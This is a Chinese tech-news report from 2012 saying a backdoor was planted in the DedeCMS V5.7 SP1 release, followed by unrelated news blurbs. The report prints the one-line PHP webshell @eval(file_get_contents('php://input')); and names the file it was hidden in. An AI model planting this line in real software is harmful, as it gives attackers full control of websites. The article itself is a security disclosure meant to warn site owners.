首页 > 动态 > 关键词  > Dedecms最新资讯  > 正文

Dedecms被曝疑似植入后门 可成功控制网站

2012-03-21 09:53 · 稿源:站长之家

站长之家(Chinaz.com)3月21日报道:昨日,乌云漏洞平台发布最新报告称,著名开源建站软件Dedecms V5.7 SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。

Dedecms被曝植入后门(站长之家配图)

据乌云报告,被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为@eval(file_get_contents(‘php://input’));,乌云介绍称,通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实,称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。

据了解,@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行,通过该后门,可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长,需立即对后门代码进行删除,以保护网站安全。

Dedecms是一款开源建站软件,其最早是由IT柏拉图个人开发,并在2007年进行了公司化运作。目前,国内有不少网站都使用了Dedecms系统,不过在Dedecms创始人IT柏拉图的离开后,Dedecms屡次被曝出安全漏洞问题。截至发稿,Dedecms官方尚未对该漏洞进行任何回应。

举报

  • 相关推荐
  • 最大的“AI色情网站”MrDeepfakes宣布永久关闭

    “Mr. Deepfakes” 的非法交易最早始于 Reddit,但在 2018 年被封禁后,就转移到了他自己的平台上。在那里,数千名深度伪造创作者分享技术知识,研究人员去年指出,“Mr. Deepfakes” 网站的论坛最终成为了 “制作深度伪造色情内容的唯一可行的技术支持来源”。

  • 最便宜的特斯拉要来了!特斯拉4月22日公布Model Q新细节

    快科技4月15日消息,据报道,特斯拉或将在4月22日公布一季度财报后披露全新入门车型的详细信息。而当前,这款被称为Model Q”最便宜的特斯拉车型假想图已流出,车辆采用Model Y同款贯穿灯,车身更为圆润,车身长度也有所缩短。此前报道显示,特斯拉首席财务官Vaibhav Taneja今年1月29日明确表示,这款经济型电动车仍按计划推进,预计2025年上半年正式推向市场,有媒体猜测发

  • AI日报:夸克发布“深度搜索”新品;AnthropicClaude络搜API;DeepSeek致谢腾讯技术团队;微软采用谷歌的A2A标准

    本期AI日报聚焦多个AI领域最新动态:1)阿里夸克发布"深度搜索"新品,采用先思考后检索模式解决复杂问题;2)Anthropic推出Claude网络搜索API,提升AI信息获取能力;3)谷歌升级Gemini 2.0 Flash图像生成功能,提升视觉质量和文字清晰度;4)DeepSeek感谢腾讯团队优化其开源通信框架,性能提升高达100%;5)苹果考虑在Safari引入AI搜索功能应对用户需求变化;6)HeyGen发布Avatar IV数字人�

  • Anthropic推出Claude络搜索API,押注“后谷歌时代”信息访问

    现在,开发者能够借助网络搜索功能,构建人工智能解决方案,无需管理自己的网络搜索基础设施,就能利用最新信息……

  • 国羽加油口号是DeepSeek想的 友:这个口号好厉害

    中国羽毛球队在2025年苏迪曼杯首轮比赛中5-0战胜阿尔及利亚队,赛前全队高喊"羽啸鼓浪巅,中国剑指天!"的霸气口号。这句由DeepSeek团队借助科技力量创作的口号,既体现了羽毛球运动精神,又展现了队员们的昂扬斗志。口号成为国羽标志性语言,激励队员为国争光。此次合作彰显科技与体育的完美结合,也体现了DeepSeek对体育事业的支持。未来期待DeepSeek继续发挥创意技术优势,为更多体育赛事提供支持,共同推动中国体育事业发展。

  • 国内设计类素材网站有哪些?免费AI简历生成网站推荐

    站长沙素材(sc.chinaz.com)是站长之家旗下专业设计素材平台,提供海量免费资源下载。主要功能包括:1. 丰富设计素材(图片、网页模板、PPT模板、音视频素材、商用字体);2. 实用在线工具(图片/视频/音频处理、字体生成);3. 专业设计开发教程(PS/AI/Sketch、编程语言等);4. 严格版权审核确保素材合法使用。平台特色:界面简洁、搜索高效、资源定期更新,注册用户可享收藏和历史记录功能。适合设计师、开发者等创意工作者获取资源提升工作效率。

  • 深度deepin 23.1正式发布!AI默认引擎切换至DeepSeek、修复超百项问题

    快科技4月16日消息,今天,深度操作系统宣布,deepin 23.1版本已正式发布。此版本聚焦于解决基础组件更新后的安装效率问题,大幅提升新用户安装体验,同时集成多项功能优化与问题修复,进一步优化系统使用。本次版本的重点改进包括内核优化、AI 默认引擎切换至DeepSeek、修复超百项用户反馈问题等,具体重点改进如下:硬件兼容性与内核优化:集成6.6/6.12内核更新、NVIDIA显卡驱动升级、Intel/AMD CPU微码更新,全面提升硬件支持与底层性能;核心功能增强:DDE新增智能镜像源管理、紧凑模式入口,全局搜索支持离线自然语言与AI处理能力;?

  • OpenAI推出轻量版Deep Research,所有用户可用!

    OpenAI 称,由于很多用户喜欢使用 Deep Research 功能,所以将推出轻量版 Deep Research,且此版本面向所有用户开放……

  • DeepSeek带飞寒武纪

    寒武纪凭借AI芯片业务实现扭亏为盈,2024年首次实现上市后盈利,2025年Q1营收11.11亿元同比暴增4230%,净利润3.55亿元。这家曾连亏8年、累计亏损54亿元的"中国版英伟达",因美国对H20芯片出口管制获得市场红利,但客户集中度过高(前五大客户贡献94.63%营收)和现金流波动仍是隐忧。当前国产芯片迎来发展机遇,华为昇腾、壁仞等企业纷纷抢占市场,行业竞争日趋激烈。

  • BYDFi正式上线链上交易工具MoonX 开启CEX+DEX双引擎时代

    2025年4月巴黎区块链周期间,BYDFi作为官方赞助商发布全新Web3产品MoonX,这是一款专为MemeCoin投资者打造的智能交易工具。MoonX集热点发现、风险筛选、智能跟单和交易优化于一体,深度集成Solana和BNB Chain两大生态,覆盖超50万Meme资产。该产品标志着BYDFi正式进入CEX与DEX并行的"双引擎时代",通过中心化撮合系统保障流动性,同时提供链上发现功能追踪热点。CEO Michael表示,未来加密交易所的竞争将转向生态系统建设,MoonX将重构链上交易体验,让用户通过单一账户即可便捷参与Web3投资。BYDFi成立于2020年,服务覆盖190多个国家和地区,拥有超100万用户。